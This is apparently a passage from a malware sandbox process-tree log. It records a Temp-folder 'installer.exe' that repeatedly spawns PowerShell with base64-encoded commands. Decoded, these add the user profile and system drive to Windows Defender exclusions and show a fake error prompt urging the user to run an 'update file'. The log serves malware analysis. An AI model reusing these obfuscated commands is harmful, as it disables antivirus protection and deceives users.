        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        130⤵
        
        PID:9172
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        130⤵
        
        PID:1000
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        131⤵
        
        PID:7252
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        131⤵
        
        PID:7856
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        131⤵
        
        PID:8740
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        132⤵
        
        PID:8904
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        132⤵
        System Location Discovery: System Language Discovery
        
        PID:9160
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        132⤵
        System Location Discovery: System Language Discovery
        
        PID:4200
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        133⤵
        
        PID:1000
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        133⤵
        
        PID:9032
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        133⤵
        
        PID:9072
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        134⤵
        
        PID:7512
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        134⤵
        
        PID:9044
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        134⤵
        System Location Discovery: System Language Discovery
        
        PID:9124
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        135⤵
        
        PID:8288
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        135⤵
        
        PID:8372
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        135⤵
        
        PID:8688
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        136⤵
        System Location Discovery: System Language Discovery
        
        PID:8200
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        136⤵
        
        PID:9068
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        136⤵
        
        PID:8464
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        137⤵
        System Location Discovery: System Language Discovery
        
        PID:9164
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        137⤵
        
        PID:7476
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        137⤵
        
        PID:9000
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        138⤵
        
        PID:8220
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        138⤵
        
        PID:8308
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        138⤵
        
        PID:9076
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        139⤵
        
        PID:9204
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        139⤵
        
        PID:9228
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        139⤵
        
        PID:9308
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        140⤵
        
        PID:9336
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        140⤵
        
        PID:9364
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        140⤵
        
        PID:9400
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        141⤵
        
        PID:9436
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        141⤵
        
        PID:9460
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        141⤵
        
        PID:9572
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        142⤵
        
        PID:9656
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        142⤵
        
        PID:9732
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        142⤵
        
        PID:9776
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        143⤵
        System Location Discovery: System Language Discovery
        
        PID:9916
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        143⤵
        
        PID:9972
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        143⤵
        
        PID:10004
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        144⤵
        
        PID:10060
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        144⤵
        
        PID:10148
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        144⤵
        
        PID:10180
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        145⤵
        
        PID:9220
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        145⤵
        
        PID:9312
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        145⤵
        
        PID:9696
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
